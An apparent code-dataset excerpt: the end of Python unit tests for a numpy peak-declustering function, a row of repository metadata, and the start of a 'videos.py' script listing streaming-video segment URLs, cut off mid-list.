x = np.array([0., 1., 0., -1., 0., 2.])
calculated = evstats.argrelmax_decluster(x, x_up=0.)
expected = np.array([1])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_2(self):
x = np.array([0., 1., 0., -1., 0., 2., 1., -1., 1.])
calculated = evstats.argrelmax_decluster(x, x_up=0.)
expected = np.array([1, 5])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_decluster(self):
x = np.array([0., 1., 2., 1., 2., 3., 2., 1., 0., 2., -1., 1.])
calculated = evstats.argrelmax_decluster(x, x_up=0.)
expected = np.array([5, 9])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0.1, 1., 2., 3., 4., 5.])
calculated = evstats.argrelmax_decluster(x)
expected = np.array([5])
np.testing.assert_array_equal(calculated, expected)
def test_find_decluster_below_upcross(self):
x = np.array([0., 1., 2., 1., 2., 3., 2., 1., 0., -1., -2., -1, -2, -1,
0., 1, 0., -1., -2., -1., 0., 1.])
calculated = evstats.argrelmax_decluster(x, x_up=0.)
expected = np.array([5, 15.])
np.testing.assert_array_equal(calculated, expected)
| 34.392638 | 79 | 0.584552 | 779 | 5,606 | 4.042362 | 0.062901 | 0.084471 | 0.058431 | 0.072404 | 0.962845 | 0.956494 | 0.956494 | 0.93744 | 0.926961 | 0.926961 | 0 | 0.046018 | 0.251873 | 5,606 | 162 | 80 | 34.604938 | 0.704816 | 0 | 0 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150794 | 1 | 0.230159 | false | 0.079365 | 0.02381 | 0 | 0.293651 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
b0dcea7175d7b8fcffd3a4e791eec8e92fdd9093 | 124,559 | py | Python | videos.py | 2218084076/hotpoor_autoclick_xhs | a52446ba691ac19e43410a465dc63f940c0e444d | [
"Apache-2.0"
] | 1 | 2021-12-21T10:42:46.000Z | 2021-12-21T10:42:46.000Z | videos.py | 2218084076/hotpoor_autoclick_xhs | a52446ba691ac19e43410a465dc63f940c0e444d | [
"Apache-2.0"
] | null | null | null | videos.py | 2218084076/hotpoor_autoclick_xhs | a52446ba691ac19e43410a465dc63f940c0e444d | [
"Apache-2.0"
] | null | null | null | import requests
import os
js_list=["https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/12C0BAD1F6E8CB74C366D11BB43B7051_0_5080_1553_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D3A269D1FA04321DDEB966FF30A0CF72_5080_10080_2018_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/998790257298087CDA1064D95D9DE2A4_10080_20080_1218_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0437188846078FD1EDC03CE517E9FDA5_20080_30080_1146_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FDC7AE1722EB09F161204401405C6054_30080_40080_1483_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/57AEEAEB63B51BC66598D1DF2AE87A0A_40080_50080_761_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7E6E3EE972A8E93BF8062CE1C72DDBE3_50080_60080_1360_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/16B9372334927AA99507D3416E7AA269_60080_70080_2055_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CC8B1AF22C9DB91A5AA44E29EB51B434_70080_80080_1035_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/30F7BF3DAB4CA2D8381FAD8DA79B7A57_80080_90080_607_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0EA70DCDDBC0EF961F6269BE21343CC4_90080_100080_1239_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7B54227ABA6ECD8FDBDC92CE106856AF_100080_110080_1118_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/365CDA9DD4B82B21C20855EC261C3A26_110080_120080_372_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/85EE9B68505943C1F0B05CDDB4AF3912_120080_130080_892_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/667714C2FABA24CC018F3C1A404A3700_130080_140080_1429_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F3252DFC4E3A637C082FA34EAA02026B_140080_150080_1302_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7B911169DD5DD524D6FC7740DD3D05B3_150080_160080_410_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/AE34FB0BAC5347793EE7AC2F2700A46B_160080_170080_598_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4328B081C0E710CF384CE5141EB7C4B9_170080_180080_801_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/865C02476E1EAE2E085CBF99C52381B0_180080_190080_616_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBt